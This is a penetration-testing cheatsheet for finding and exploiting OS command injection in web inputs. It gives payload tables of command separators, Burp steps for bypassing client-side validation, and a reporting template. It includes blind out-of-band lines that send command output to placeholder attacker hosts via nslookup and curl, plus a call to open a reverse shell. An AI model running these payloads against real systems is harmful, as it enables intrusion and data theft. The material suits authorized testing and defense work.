🛡️ Methodology Checklist
- Identify injection point: URL params, POST body, headers, cookies
- Test for inline injection:
; id,&& id,| id,$(id),`id` - Confirm blind injection: time-based (
; sleep 5), DNS OOB - Exfiltrate data via DNS for blind:
; nslookup $(whoami).[COLLAB_HOST] - Establish reverse shell once confirmed
- Test all injection characters: & | ; ` $() {} newline
- Document exact injection point and parameter for report
🎯 Operational Context
Use when: User-supplied input passed to OS command without sanitization — inject command separators (;, &&, |, backtick) to execute arbitrary commands.
Think Dumber First: Test all injection chars: ; id, && id, | id, $(id), `id`. Check if output is reflected or blind. Simple ;id in a ping field often works first try.
Skip when: Input is properly validated and sanitized — pivot to other injection techniques (SQLi, SSTI, XXE).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
127.0.0.1; whoami | Semicolon — always works (Linux only) |
127.0.0.1%0a whoami | URL-encoded newline — alternative Linux separator |
127.0.0.1& whoami | Background both commands (space before whoami avoids ambiguity) |
127.0.0.1 | whoami | Pipe — only second command output shown |
127.0.0.1&& whoami | AND — second runs only if first succeeds |
127.0.0.1|| whoami | OR — second runs only if first fails (useful: 127.0.0.1x || whoami) |
127.0.0.1; whoami → intercept → change to 127.0.0.1%0a whoami | Send in Burp Repeater — bypass client-side JS validation |
$(whoami) | Inline subshell — inject into strings |
`whoami` | Backtick subshell — alternative to $() |
🔬 Deep Dive & Workflow
Operator Comparison Table
| Operator | Linux | Windows CMD | PowerShell | Notes |
|---|---|---|---|---|
; | ✅ | ❌ | ✅ | Not supported in CMD |
\n (%0a) | ✅ | ❌ | ✅ | URL-encode newline |
& | ✅ | ✅ | ✅ | Both commands run, both outputs shown |
| | ✅ | ✅ | ✅ | Only second output shown |
&& | ✅ | ✅ | ✅ | Second runs only if first succeeds |
|| | ✅ | ✅ | ✅ | Second runs only if first fails |
$(cmd) | ✅ | ❌ | ✅ | Inline subshell |
`cmd` | ✅ | ❌ | ❌ | Backtick subshell |
Detection Flow
Test input: 127.0.0.1; whoami
├── Direct response → Blind? No → classic injection
└── No response → Blind injection
├── Time delay: 127.0.0.1; sleep 5
├── DNS OOB: 127.0.0.1; nslookup [LHOST]
└── HTTP OOB: 127.0.0.1; curl http://[LHOST]/$(whoami)
Front-End Bypass — Always Test in Burp
1. Submit normally — capture in Proxy
2. Send to Repeater (Ctrl+R)
3. Modify the parameter value to include injection operator + command
4. Common bypass: replace ; with %0a in Repeater (URL-encoded newline)
5. Send → look for command output in response body
Client-side validation (JS-only) provides zero security — all input must be validated server-side. Bypassing it via Burp is the standard first step.
Common Initial Test Commands
# Linux — safe enumeration
whoami; id; hostname; uname -a; cat /etc/passwd
# Windows — safe enumeration
whoami & ipconfig & systeminfo
# DNS OOB (blind, no direct output)
nslookup [LHOST]
curl http://[LHOST]/🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Injection char filtered | WAF or server-side filter | Try URL encoding: %3b=;, %26%26=&&; also try newline %0a as separator |
| Command executes but no output | Blind command injection | Use OOB: curl http://[LHOST]/$(id) or nslookup $(id).[LHOST] |
| Only specific commands work | Shell restricted | Check: which bash sh dash ksh; try alternate command syntax |
| Windows target — Linux commands fail | OS mismatch | Use Windows commands: whoami, ipconfig, dir; PowerShell: $(Get-Item . ).FullName |
| Command injection in JSON/XML body | Encoding context wrong | Ensure proper JSON escaping; inject in string value field, not key |
📝 Reporting Trigger
Finding Title: OS Command Injection in User Input Field
Impact: Command injection allows execution of arbitrary operating system commands in the context of the web server process, enabling server compromise, credential extraction, and lateral movement to internal network resources.
Root Cause: User-supplied input passed directly to OS command execution function (PHP exec(), Python os.system(), Java Runtime.exec()) without input validation or sanitization.
Recommendation: Never use OS command execution functions with user input. Replace with safe library functions for the intended operation. Implement allowlist input validation. Run web application as dedicated low-privilege service account. Apply WAF rules for command injection patterns.